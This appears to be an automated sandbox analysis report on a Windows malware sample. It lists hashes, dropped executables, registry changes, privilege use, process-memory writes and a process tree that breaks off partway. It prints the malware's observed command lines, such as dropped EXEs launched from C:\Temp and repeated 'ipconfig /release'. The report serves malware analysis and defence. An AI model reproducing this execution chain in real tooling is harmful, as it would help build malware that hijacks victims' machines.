875d126ef6f40e382025d42934996a0acee0439471f43b11b497a755b41e0124

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13/10/2024, 17:18

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
Size

361KB
MD5

411c882f27dd2be10db3f0737a13ccc1
SHA1

b6a2966db0a0c44dc6345c4c8f5f2ec27bd44317
SHA256

875d126ef6f40e382025d42934996a0acee0439471f43b11b497a755b41e0124
SHA512

f05dac165dbecf738ab1e4f9075ae33bc107dca42d890d79ba91bab851a6d9a27fa2477e6132184c656e55ccfc33d1eeadc55b86560d8f17b92717fce992aef7
SSDEEP

6144:jflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:jflfAsiVGjSGecvX

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
4532	trljdbvtolgeywqo.exe
2472	CreateProcess.exe
5084	dywqoigayt.exe
2108	CreateProcess.exe
712	CreateProcess.exe
3240	i_dywqoigayt.exe
3124	CreateProcess.exe
4172	oigaysqlid.exe
1076	CreateProcess.exe
3004	CreateProcess.exe
4044	i_oigaysqlid.exe
3180	CreateProcess.exe
5024	pnifaysqki.exe
3236	CreateProcess.exe
5036	CreateProcess.exe
3640	i_pnifaysqki.exe
2464	CreateProcess.exe
3152	nhfaxspkic.exe
808	CreateProcess.exe
2264	CreateProcess.exe
3500	i_nhfaxspkic.exe
1804	CreateProcess.exe
1816	hfzxrpkhcz.exe
3896	CreateProcess.exe
2588	CreateProcess.exe
228	i_hfzxrpkhcz.exe
3876	CreateProcess.exe
2736	hxrpjhczus.exe
3900	CreateProcess.exe
4912	CreateProcess.exe
684	i_hxrpjhczus.exe
2472	CreateProcess.exe
3788	bwuomhezwr.exe
1500	CreateProcess.exe
2304	CreateProcess.exe
4488	i_bwuomhezwr.exe
3188	CreateProcess.exe
1992	wuomgeywro.exe
3756	CreateProcess.exe
3584	CreateProcess.exe
3296	i_wuomgeywro.exe
3180	CreateProcess.exe
2892	trljdbwtol.exe
4188	CreateProcess.exe
1832	CreateProcess.exe
4388	i_trljdbwtol.exe
3820	CreateProcess.exe
4196	ywqoigtqlj.exe
2696	CreateProcess.exe
3136	CreateProcess.exe
4968	i_ywqoigtqlj.exe
4400	CreateProcess.exe
1320	vtnlfdyvqn.exe
3732	CreateProcess.exe
952	CreateProcess.exe
2120	i_vtnlfdyvqn.exe
424	CreateProcess.exe
3232	vqnifaysqk.exe
4024	CreateProcess.exe
3140	CreateProcess.exe
2452	i_vqnifaysqk.exe
3756	CreateProcess.exe
1992	pnhfzxspkh.exe
3188	CreateProcess.exe

System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_bwuomhezwr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xspkhcausm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_vtolgdywqo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trljdbvtolgeywqo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhfaxspkic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_hxrpjhczus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wuomgeywro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_vtnlfdyvqn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uomhezxrpj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_rpjhbztrmj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	olgeywqojg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_dywqoigayt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vtnlfdyvqo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vtnlfdyvqn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_xspkhcausm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_ywqoigtqlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_vqnifaysqk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_olgeywqojg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vtolgdywqo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rpjhbztrmj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hxrpjhczus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vqnifaysqk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pnhfzxspkh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_uomhezxrpj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CreateProcess.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	oigaysqlid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hfzxrpkhcz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vtnlfdyvqn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_vtnlfdyvqo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dywqoigayt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_nhfaxspkic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_pnifaysqki.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_hfzxrpkhcz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bwuomhezwr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_wuomgeywro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trljdbwtol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_trljdbwtol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_oigaysqlid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pnifaysqki.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ywqoigtqlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_pnhfzxspkh.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3192	ipconfig.exe
1132	ipconfig.exe
3160	ipconfig.exe
2104	ipconfig.exe
3064	ipconfig.exe
5088	ipconfig.exe
1184	ipconfig.exe
3104	ipconfig.exe
4796	ipconfig.exe
2068	ipconfig.exe
1212	ipconfig.exe
2772	ipconfig.exe
4944	ipconfig.exe
4032	ipconfig.exe
1188	ipconfig.exe
4760	ipconfig.exe
4592	ipconfig.exe
3408	ipconfig.exe
3156	ipconfig.exe
4768	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4191850116"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31137171"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4191850116"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{257102BF-8987-11EF-BEF1-FE5A08828E79} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c88e6291f50dd448b150439a5f2f5a3d00000000020000000000106600000001000020000000ecf3de900c3355c10ec00e302445fde3aa574227883550c88c06c24a5d5ee966000000000e8000000002000020000000ca4fac5ade86dac43a5c7d2053b6edf102dd02716522b35a73fe6f6e5b3b40df2000000089b4f9c06054a084f28393e0a9606bd69edc71d58bfdcd10943bf2bd9166a47540000000239e57a075a4e8f0ead02a0ddab67c14b2099e75d3c1c8c789ac5dbe5d5dfbce28382c8e9f75b3cb36c02bba06e22b28a131225cf18e82d4032273af85d29252	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50e758fa931ddb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30ec5ffa931ddb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4195131930"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c88e6291f50dd448b150439a5f2f5a3d000000000200000000001066000000010000200000000f4e07f1b69f37f746f947f6af3a588412168bc9b2221beefef0637f9607a15a000000000e8000000002000020000000aae02d0296d61ce36711f23c1324451ba7031de5df8fb40a14cca7abcee71dd820000000ab34e3280a32a26591bd97f1e4b8d1a922b748d334e388d47260db53e9c9304e40000000df0b6d56d5a4b262ccfbc59f2250e3fe72ba5ebcb618c4e34e39afa07003e6207774ad5fab6fdcb3eabd3f2075507ffca0074e2f2704500ffa117b06b40ce971	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137171"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137171"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "435604876"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4532	trljdbvtolgeywqo.exe
4532	trljdbvtolgeywqo.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe

Suspicious behavior: LoadsDriver 20 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	3240	i_dywqoigayt.exe
Token: SeDebugPrivilege	4044	i_oigaysqlid.exe
Token: SeDebugPrivilege	3640	i_pnifaysqki.exe
Token: SeDebugPrivilege	3500	i_nhfaxspkic.exe
Token: SeDebugPrivilege	228	i_hfzxrpkhcz.exe
Token: SeDebugPrivilege	684	i_hxrpjhczus.exe
Token: SeDebugPrivilege	4488	i_bwuomhezwr.exe
Token: SeDebugPrivilege	3296	i_wuomgeywro.exe
Token: SeDebugPrivilege	4388	i_trljdbwtol.exe
Token: SeDebugPrivilege	4968	i_ywqoigtqlj.exe
Token: SeDebugPrivilege	2120	i_vtnlfdyvqn.exe
Token: SeDebugPrivilege	2452	i_vqnifaysqk.exe
Token: SeDebugPrivilege	3784	i_pnhfzxspkh.exe
Token: SeDebugPrivilege	4188	i_xspkhcausm.exe
Token: SeDebugPrivilege	1180	i_uomhezxrpj.exe
Token: SeDebugPrivilege	1344	i_rpjhbztrmj.exe
Token: SeDebugPrivilege	3212	i_olgeywqojg.exe
Token: SeDebugPrivilege	1812	i_vtolgdywqo.exe
Token: SeDebugPrivilege	3140	i_vtnlfdyvqo.exe
Token: SeDebugPrivilege	2948	i_vtnlfdyvqn.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1400	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1400	iexplore.exe
1400	iexplore.exe
4820	IEXPLORE.EXE
4820	IEXPLORE.EXE
4820	IEXPLORE.EXE
4820	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 4532	4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe	87
PID 4648 wrote to memory of 4532	4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe	87
PID 4648 wrote to memory of 4532	4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe	87
PID 4648 wrote to memory of 1400	4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe	88
PID 4648 wrote to memory of 1400	4648	411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe	88
PID 1400 wrote to memory of 4820	1400	iexplore.exe	89
PID 1400 wrote to memory of 4820	1400	iexplore.exe	89
PID 1400 wrote to memory of 4820	1400	iexplore.exe	89
PID 4532 wrote to memory of 2472	4532	trljdbvtolgeywqo.exe	90
PID 4532 wrote to memory of 2472	4532	trljdbvtolgeywqo.exe	90
PID 4532 wrote to memory of 2472	4532	trljdbvtolgeywqo.exe	90
PID 5084 wrote to memory of 2108	5084	dywqoigayt.exe	93
PID 5084 wrote to memory of 2108	5084	dywqoigayt.exe	93
PID 5084 wrote to memory of 2108	5084	dywqoigayt.exe	93
PID 4532 wrote to memory of 712	4532	trljdbvtolgeywqo.exe	96
PID 4532 wrote to memory of 712	4532	trljdbvtolgeywqo.exe	96
PID 4532 wrote to memory of 712	4532	trljdbvtolgeywqo.exe	96
PID 4532 wrote to memory of 3124	4532	trljdbvtolgeywqo.exe	98
PID 4532 wrote to memory of 3124	4532	trljdbvtolgeywqo.exe	98
PID 4532 wrote to memory of 3124	4532	trljdbvtolgeywqo.exe	98
PID 4172 wrote to memory of 1076	4172	oigaysqlid.exe	100
PID 4172 wrote to memory of 1076	4172	oigaysqlid.exe	100
PID 4172 wrote to memory of 1076	4172	oigaysqlid.exe	100
PID 4532 wrote to memory of 3004	4532	trljdbvtolgeywqo.exe	103
PID 4532 wrote to memory of 3004	4532	trljdbvtolgeywqo.exe	103
PID 4532 wrote to memory of 3004	4532	trljdbvtolgeywqo.exe	103
PID 4532 wrote to memory of 3180	4532	trljdbvtolgeywqo.exe	105
PID 4532 wrote to memory of 3180	4532	trljdbvtolgeywqo.exe	105
PID 4532 wrote to memory of 3180	4532	trljdbvtolgeywqo.exe	105
PID 5024 wrote to memory of 3236	5024	pnifaysqki.exe	107
PID 5024 wrote to memory of 3236	5024	pnifaysqki.exe	107
PID 5024 wrote to memory of 3236	5024	pnifaysqki.exe	107
PID 4532 wrote to memory of 5036	4532	trljdbvtolgeywqo.exe	110
PID 4532 wrote to memory of 5036	4532	trljdbvtolgeywqo.exe	110
PID 4532 wrote to memory of 5036	4532	trljdbvtolgeywqo.exe	110
PID 4532 wrote to memory of 2464	4532	trljdbvtolgeywqo.exe	112
PID 4532 wrote to memory of 2464	4532	trljdbvtolgeywqo.exe	112
PID 4532 wrote to memory of 2464	4532	trljdbvtolgeywqo.exe	112
PID 3152 wrote to memory of 808	3152	nhfaxspkic.exe	114
PID 3152 wrote to memory of 808	3152	nhfaxspkic.exe	114
PID 3152 wrote to memory of 808	3152	nhfaxspkic.exe	114
PID 4532 wrote to memory of 2264	4532	trljdbvtolgeywqo.exe	120
PID 4532 wrote to memory of 2264	4532	trljdbvtolgeywqo.exe	120
PID 4532 wrote to memory of 2264	4532	trljdbvtolgeywqo.exe	120
PID 4532 wrote to memory of 1804	4532	trljdbvtolgeywqo.exe	122
PID 4532 wrote to memory of 1804	4532	trljdbvtolgeywqo.exe	122
PID 4532 wrote to memory of 1804	4532	trljdbvtolgeywqo.exe	122
PID 1816 wrote to memory of 3896	1816	hfzxrpkhcz.exe	124
PID 1816 wrote to memory of 3896	1816	hfzxrpkhcz.exe	124
PID 1816 wrote to memory of 3896	1816	hfzxrpkhcz.exe	124
PID 4532 wrote to memory of 2588	4532	trljdbvtolgeywqo.exe	127
PID 4532 wrote to memory of 2588	4532	trljdbvtolgeywqo.exe	127
PID 4532 wrote to memory of 2588	4532	trljdbvtolgeywqo.exe	127
PID 4532 wrote to memory of 3876	4532	trljdbvtolgeywqo.exe	129
PID 4532 wrote to memory of 3876	4532	trljdbvtolgeywqo.exe	129
PID 4532 wrote to memory of 3876	4532	trljdbvtolgeywqo.exe	129
PID 2736 wrote to memory of 3900	2736	hxrpjhczus.exe	131
PID 2736 wrote to memory of 3900	2736	hxrpjhczus.exe	131
PID 2736 wrote to memory of 3900	2736	hxrpjhczus.exe	131
PID 4532 wrote to memory of 4912	4532	trljdbvtolgeywqo.exe	134
PID 4532 wrote to memory of 4912	4532	trljdbvtolgeywqo.exe	134
PID 4532 wrote to memory of 4912	4532	trljdbvtolgeywqo.exe	134
PID 4532 wrote to memory of 2472	4532	trljdbvtolgeywqo.exe	136
PID 4532 wrote to memory of 2472	4532	trljdbvtolgeywqo.exe	136

C:\Users\Admin\AppData\Local\Temp\411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\411c882f27dd2be10db3f0737a13ccc1_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Temp\trljdbvtolgeywqo.exe
  C:\Temp\trljdbvtolgeywqo.exe run
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\dywqoigayt.exe ups_run
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2472
  - - C:\Temp\dywqoigayt.exe
      C:\Temp\dywqoigayt.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5084
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2108
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4944
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_dywqoigayt.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:712
  - - C:\Temp\i_dywqoigayt.exe
      C:\Temp\i_dywqoigayt.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3240
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\oigaysqlid.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3124
  - - C:\Temp\oigaysqlid.exe
      C:\Temp\oigaysqlid.exe ups_run
      4⤵
